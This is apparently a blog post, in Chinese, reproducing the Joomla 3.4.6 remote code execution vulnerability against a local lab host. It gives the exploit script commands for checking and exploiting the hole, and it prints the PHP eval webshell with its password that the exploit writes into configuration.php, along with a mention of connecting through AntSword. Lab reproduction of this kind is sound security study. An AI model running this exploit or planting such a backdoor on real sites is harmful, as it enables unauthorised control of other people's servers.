zoukankan      html  css  js  c++  java
  • Joomla 3.4.6 Remote Code Execution漏洞复现

    0x00:简介

    • Joomla是一套全球有名的CMS系统。
    • Joomla基于PHP语言加上MySQL数据库所开发出来的WEB软件系统,目前最新版本是3.9.12。
    • Joomla可以在多种不同的平台上部署并且运行。

    0x01:环境配置

    靶机ip:192.168.204.129
    环境下载:https://downloads.joomla.org/it/cms/joomla3/3-4-6
    php版本:PHP 5.3.10以上

    在window7下使用phpstudy搭建,将下载的压缩包解压到phpstudy的www目录下(根据自己)。然后输入http://192.168.204.129/exploit/Joomla 进行安装。然后按照提示进行配置。如图:

    0x02:漏洞复现

    漏洞位置

    http://x.x.x.x/configuration.php
    

     影响范围:3.0.0-3.4.6 

    漏洞利用

    • 使用脚本进行验证:显示Vulnerable证明存在漏洞
    python3 Joomla-3.4.6-RCE.py -t http://192.168.204.129/exploit/Joomla/

    • 漏洞利用

    在configuration.php中写入一句话木马,木马连接密码mbvmmqcrhfnsowwnyvhkkwjejbpytgnznswyefystnqbrirvvg

    python3 Joomla-3.4.6-RCE.py -t http://192.168.204.129/exploit/Joomla/ --exploit -l 192.168.204.129 -p 8080

    在末尾写入了一句话,因为虚拟机没装什么编辑器。完整的写入代码为:

    if(isset($_POST['mbvmmqcrhfnsowwnyvhkkwjejbpytgnznswyefystnqbrirvvg'])) eval($_POST['mbvmmqcrhfnsowwnyvhkkwjejbpytgnznswyefystnqbrirvvg']);

    尝试用antsword连接

     

    Joomla_cms建议更新到最新版本3.9.12

    参考文章格式

    洛米唯熊复现文章

    RCE利用脚本:https://github.com/momika233/Joomla-3.4.6-RCE

  • 相关阅读:
    HDU 4552 怪盗基德的挑战书
    Qt中QUdpSocket序列化问题
    简单Qt网络通信
    QT快捷键
    Qt 程序退出时断言错误——_BLOCK_TYPE_IS_VALID(pHead->nBlockUse),由setAttribute(Qt::WA_DeleteOnClose)引起
    [转载]
    [百科]
    [百科]sys/types.h
    string.h文件中函数用法
    c++ <string.h>中包括哪些常用函数
  • 原文地址:https://www.cnblogs.com/BOHB-yunying/p/11647644.html
Copyright © 2011-2022 走看看